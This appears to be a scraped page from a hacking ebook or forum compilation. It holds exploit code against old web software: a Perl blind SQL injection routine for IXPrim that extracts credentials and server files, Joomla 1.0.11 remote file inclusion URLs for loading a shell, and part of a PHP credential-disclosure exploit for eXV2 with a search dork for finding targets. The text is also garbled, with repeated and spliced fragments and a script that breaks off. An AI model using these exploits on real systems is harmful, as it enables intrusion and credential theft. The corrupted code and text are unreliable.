
Hacker Professional Ebook part 388 pot




# # magic_quotes_gpc=off # ==================== # [SQL] and LOAD_FILE("C:/Program Files/EasyPHP1-8/www/ixprim- 1.2/html/mainfile.php") # REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]"); # # magic_quotes_gpc=on # =================== # [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char (103),char(114), # char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char (47),char(69), # char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56 ),char(47),char(119), # char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),c har(109),char(45), # char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char( 47),char(109),char(97), # char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),c har(104),char(112))) # REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),c har(69),char(34),char(44), # char(32),char(39),char([PART_OF_IXP_CODE]))) # &sendreq(1,32,"load_file(concat(".concatchar($fpd).")) REGEXP(concat(".concatchar("IXP_CODE\", '")); exit(1); # Determine if the sql request return true or false. # Modify the username's charset if it contain special char. # sleep(2) needed for bypass the antiflood protection. # If the username's length > 19 the exploit doesn't works. 
# sub sendreq() { my($start,$limit,$sql) = ($_[0],$_[1],$_[2]); my($gchar,$char) = ''; @charset=(0 9) if $sql =~ /^(length|select%20uid)/; @charset=(a z,0 9) if $sql =~ /^select%20uname/; @charset=(a f,0 9) if $sql =~ /^(select%20pass|load_file)/; for($y=$start;$y<=$limit;$y++) { foreach $char (@charset) { print STDERR "\r sploit> $gchar$char"; if($sql !~ /load_file/) { $req = GET $bsql."%20and%20substr((".$sql."),$y,1)=".concatchar($char);} else { $req = GET $bsql."%20and%20".$sql.",".concatchar($gchar.$char)."))";} sleep(2); $res = ($ua->request($req))->content; if($res =~ /<br \/> <div id="comments">/) { $gchar .= $char; last;}} if(($sql =~ /length/) and ($gchar.$char =~ /^([0-9]+)9$/)){ last;}} print STDERR "\n"; return $gchar.$char; } sub concatchar() { my $string = shift; my $temp = ''; for($i=0;$i<length($string);$i++) { $temp .= "char(".ord(substr($string,$i,1)).")"; $temp .= ',' if $i != (length($string)-1); } return $temp; } black_hat_cr(HCE) Joomla 1.0.11 (newest) RFI - Vuln Code: > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-= > [2006-Nov-06] register_globals is On. > > Bug : include_once ( $mosConfig_absolute_path . '/language/' . $mosConfig_lang .'.php' ); > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-= > > Exploit : www.target.com/Jooma/installation/index.php?mosConfig_absolute_path=[shell]? > > www.target.com/Joomla/administrator/components/com_admin/admin.admin.html. php?mosConfig_absolute_path=[shell]? chắc đây là lý do 1 số site gov.vn vừa mới bị hack micimacko(HCE) Joomla Banner Component Index.PHP SQL Injection Vulnerability Code: #!/usr/bin/php -q -d short_open_tag=on <? print_r(' exV2 <= 2.0.4.3 "sort" SQL injection / administrative credentials disclosure exploit mail: retrog@alice.it site: http://retrogod.altervista.org dork: "Powered by eXV2 Vers" '); /* this works regardless of php.ini settings against Mysql >= 4.1 (allowing subs) and if 'messages' module is enabled */ if ($argc<4) { print_r(' Usage: php '.$argv[0].' 
host path user pass OPTIONS host: target server (ip/hostname) path: path to exv2 user/pass: valide user credentials Options: -T[prefix: specify a table prefix, other than default (exv2_) -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' 2.2.2.2 /exv2/ rgod test -P1.1.1.1:80 php '.$argv[0].' 1.1.1.1 / rgod test -p81 '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy ';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock). REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),c har(69),char(34),char(44), # char(32),char(39),char( [PART_ OF_IXP_CODE]))) # &sendreq(1,32,"load_file(concat(".concatchar($fpd).")). 
Files/EasyPHP1-8/www/ixprim- 1.2/html/mainfile.php") # REGEXP("define("IXP_CODE", ' [PART_ OF_IXP_CODE]"); # # magic_quotes_gpc=on # =================== # [SQL] and LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char (103),char(114),

